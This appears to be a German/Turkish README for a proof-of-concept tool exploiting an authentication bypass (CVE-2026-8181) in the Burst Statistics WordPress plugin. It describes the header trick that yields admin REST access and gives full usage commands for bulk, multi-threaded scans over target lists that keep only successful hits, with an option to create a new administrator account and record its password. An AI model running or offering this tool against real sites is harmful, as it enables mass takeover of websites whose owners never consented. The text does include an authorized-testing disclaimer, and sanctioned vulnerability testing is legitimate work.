
CVE-2026-8181 PoC: Burst Statistics (3.4.0–3.4.1.1) Authentifizierungsumgehung. Python-Tool – Einzel- und Multi-Ziel-Scans, Threaded-Worker, TXT-Berichte. Nur für autorisierte Tests. Maintainer: mürrez.
DE: Kontrollierter PoC und kurze technische Hinweise für authorisierte Sicherheitstests des Authentifizierungsbypasses in Burst Statistics.
TR: Burst Statistics eklentisindeki kimlik doğrulama atlatası için yetkili güvenlik testi amaçlı kontrollü PoC ve kısa teknik özet.
| Feld | Detail |
|---|---|
| Was | Authentifizierungsbypass (CWE-287) in Burst Statistics: manipulierte Header können REST-Anfragen auf vollständigen Admin-Kontext eskalieren. |
| Versionen | Verwundbar: 3.4.0, 3.4.1, 3.4.1.1 · Verwenden: 3.4.2 oder neuer |
| Schweregrad | CVSS ~9.8 (Kritisch); remote, ohne Authentifizierung unter geeigneten Bedingungen. |
| Dieses Repo | CVE-2026-8181.py — Laborautomatisierung: Einzelziel, Bulk-Liste, Thread-Pool, selektive TXT-Ausgabe. |
Hinweis: Die 200.000+ aktive Installationen auf WordPress.org beziehen sich auf die gesamte Nutzerbasis des Plugins – das bedeutet nicht, dass jede Seite eine verwundbare Version ausführt. Die tatsächliche Auswirkung erfordert die Überprüfung von Version + Umgebung (HTTP-/Anwendungspasswort-Verfügbarkeit usw.).
| Alan | Detay |
|---|---|
| Ne | Burst Statistics için kimlik doğrulama atlatası (CWE-287). Özel başlıklar ile REST isteğinde tam yönetici bağlamı. |
| Sürüm | Etkilenir: 3.4.0, 3.4.1, 3.4.1.1 · Önerilir: 3.4.2 ve üzeri |
| Ciddiyet | CVSS ~9.8 (Critical); uygun koşullarda uzaktan ve kimlik gerektirmeden. |
| Bu depo | CVE-2026-8181.py — lab otomasyonu: tek hedef, liste taraması, iş parçacığı havuzu, seçici TXT çıktısı. |
Not: WordPress.org’daki 200.000+ aktif kurulum sayısı eklentinin tüm kullanıcı tabanıdır; sitelerin tamamının zafiyetli sürümde olduğu anlamına gelmez. Gerçek etki için sürüm + ortam (HTTP, uygulama parolası uygunluğu vb.) doğrulanmalıdır.
GitHub-Flavored Markdown bettet keine binären GIFs ein, ohne dass eine Datei im Repository vorhanden ist. Die obigen Typing SVG-Schnipsel (CDN) simulieren Bewegung. Um einen eigenen Screen-Capture hinzuzufügen:

GitHub Markdown, repoda dosya olmadan GIF gömmeyi desteklemez. Üstteki Typing SVG (CDN) yazı animasyonu verir. Kendi demosun için:

flowchart LR
A[Client-Anfrage] --> B[X-BURSTMAINWP: 1]
A --> C[Authorization: Basic]
B --> D[plugins_loaded]
D --> E[is_mainwp_authenticated]
E --> F{wp_authenticate_application_password == null?}
F -->|Falsch behandelter Zweig| G[get_user_by login]
G --> H[wp_set_current_user]
H --> I[REST: vollständiger Admin-Kontext]
flowchart LR
A[İstek] --> B[X-BURSTMAINWP: 1]
A --> C[Authorization: Basic]
B --> D[plugins_loaded]
D --> E[is_mainwp_authenticated]
E --> F{wp_authenticate_application_password == null?}
F -->|Yanlış dal| G[get_user_by login]
G --> H[wp_set_current_user]
H --> I[REST: tam admin bağlamı]
| Funktion | Beschreibung |
|---|---|
| Einzelziel | -u Basis-URL |
| Mehrere Ziele | -f targets.txt (eine URL pro Zeile; # als Kommentar) |
| Parallelität | -j N Arbeiter (begrenzt) |
| Kombinierte Datei | -o datei.txt — mit -f werden nur erfolgreiche Exploits angehängt |
| Pro-Host-Dateien | --output-dir — nur Erfolge erhalten host.txt (Fehlschläge werden übersprungen) |
| Neuer Admin | --create-user — zufälliger Benutzer via REST (Passwort erscheint danach im Bericht) |
| TLS (Labor) | -k deaktiviert die Zertifikatsprüfung (nur vertrauenswürdige Labore) |
Mit -f sind -o und --output-dir gegenseitig ausschließend.
| Özellik | Açıklama |
|---|---|
| Tek hedef | -u kök adres |
| Çoklu hedef | -f targets.txt (satır başına URL; # yorumu) |
| Paralellik | -j N işçi (üst sınırlı) |
| Tek dosya | -o dosya.txt — -f ile yalnızca başarılı exploit eklenir |
| Klasör çıktısı | --output-dir — sadece başarılılar host.txt alır |
| Yeni admin | --create-user — REST ile rastgele kullanıcı (şifre raporda) |
| TLS (lab) | -k sertifika doğrulamasını kapatır (yalnızca güvenilir lab) |
-f modunda -o ile --output-dir aynı anda kullanılamaz.
pip3 install requests urllib3
# Einzelne Seite, Berichtsdatei
python3 CVE-2026-8181.py -u http://lab.local -U admin -o bericht.txt -k
# Einzelne Seite + neuer Admin (Labor)
python3 CVE-2026-8181.py -u http://lab.local -U admin --create-user -o bericht.txt -k
# Mehrere + kombinierte Datei (nur Erfolge)
python3 CVE-2026-8181.py -f targets.txt -j 20 -o erfolge.txt -k
# Mehrere + Pro-Host-Dateien im Ordner (nur Erfolge)
python3 CVE-2026-8181.py -f targets.txt -j 20 --output-dir ./ergebnisse -k
# Tek site, rapor
python3 CVE-2026-8181.py -u http://lab.local -U admin -o sonuc.txt -k
# Tek site + yeni yönetici (lab)
python3 CVE-2026-8181.py -u http://lab.local -U admin --create-user -o sonuc.txt -k
# Çoklu + birleşik dosya (yalnızca başarılılar)
python3 CVE-2026-8181.py -f targets.txt -j 20 -o basarili.txt -k
# Çoklu + klasörde site başına dosya (yalnızca başarılılar)
python3 CVE-2026-8181.py -f targets.txt -j 20 --output-dir ./results -k